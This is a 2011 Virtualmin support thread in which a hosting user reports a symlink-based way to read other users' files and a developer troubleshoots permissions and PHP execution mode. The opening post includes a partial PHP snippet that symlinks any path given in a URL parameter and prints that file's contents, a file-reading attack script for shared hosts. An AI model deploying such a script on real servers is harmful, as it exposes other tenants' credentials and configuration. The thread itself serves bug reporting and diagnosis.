Dear Virtualmin team,
I found that virtualmin on my box can be bypass user permission by creating a symlink file. In easy way, user A create a .txt file that link to another config.php file at another user home dir, and then he can easily read it.
$k = $_GET['c']; $flib = "data.txt";
if ($k == "") { die; }else{ unlink($flib); $sym = $k; $link = getcwd() . "/" . $flib; symlink($sym, $link); if ($k{0} == "/") { echo " window.location = '" . $flib . "'"; }else{ echo "
<
pre>"; echo readlink($flib) . "\n"; echo "Filesize: " . linkinfo($flib) . "B\n\n"; $ddir = getcwd(); $file2 = str_replace($DOCUMENT_ROOT,'' , $ddir); $file2 = "http://" . $SERVER_NAME . $filee . $flib; $result = file_get_contents($file2); echo $result;
i m not sure that move ls and ln command to /root folder could fix this issue or not. Tell me more about what happen if i move 2 command and virtualmin will not working properly.
Thanks, NhanCM
Comments
Submitted by JamieCameron on Thu, 10/06/2011 - 12:02 Comment #1
Do you mean one user can read another user's files via a symlink like this?
This shouldn't be possible, as each user's home dir is readable only by the domain's group.
Submitted by nhancm on Thu, 10/06/2011 - 12:08 Comment #2
@JamieCameron : Yes, one user can read all of other user dir on my box, this attack also named local attack.
And i wish, any one here can fix this to make user can not access outside his/her directory folder.
Thanks,
Submitted by JamieCameron on Thu, 10/06/2011 - 12:13 Comment #3
The default settings in Virtualmin are for home directories to be non-world-readable.
What are the permissions on the target user's home directory?
Submitted by nhancm on Thu, 10/06/2011 - 12:20 Comment #4
-rw-r--r-- *.php for all as default uploading via FTP client. <<< it's result when i try ls -la *.php
Yes, home user are jail to his/her /home directory folder and it's default config now in my box.
Thanks,
Submitted by JamieCameron on Thu, 10/06/2011 - 12:28 Comment #5
How about the /home/targetusername directory? I'd be interested to see the permissions as shown by
ls -ld /home/targetusernameSubmitted by nhancm on Thu, 10/06/2011 - 12:43 Comment #6
-rw-r--r-- too, this is default on target directory.
Submitted by JamieCameron on Thu, 10/06/2011 - 12:52 Comment #7
Ok .. so if you SSH in as the user who created the symlink, can you read from it with
cat?Submitted by nhancm on Thu, 10/06/2011 - 13:05 Comment #8
NO
the funny thing is that, but in php getcontent is OKAY
phim_moss@nltit $ cat /home/phim_moss/public_html/test/sniper4.txt cat: /home/phim_moss/public_html/test/sniper4.txt: Permission denied
Submitted by JamieCameron on Thu, 10/06/2011 - 13:10 Comment #9
Which PHP execution mode do you have enabled for this domain (at Server Configuration -> Website Options) ?
Submitted by nhancm on Thu, 10/06/2011 - 13:31 Comment #10
Herer is my screen shot : https://lh6.googleusercontent.com/-7kHoP0_2zKU/To3zlAnNVcI/AAAAAAAAAGk/K...
FCGId php
Submitted by JamieCameron on Thu, 10/06/2011 - 13:59 Comment #11
That's odd, as PHP scripts should execute with domain owner permissions.
If you upload a simple script in the source domain that prints the permissions it run as like :
<?phpsystem("id -a");
?>
what does it output?
Submitted by nhancm on Thu, 10/06/2011 - 21:12 Comment #12
uid=508(phim_moss) gid=508(phim_moss) groups=508(phim_moss) <<< the out put.
sorry for late reply, now is 9am in vietnam
Submitted by JamieCameron on Thu, 10/06/2011 - 21:59 Comment #13
Ok, so it is clearly running with domain owner permissions ...
I don't see how it could possibly access a file that you can't access from the shell. I'd have to login to your system myself as the source user to see what is going on.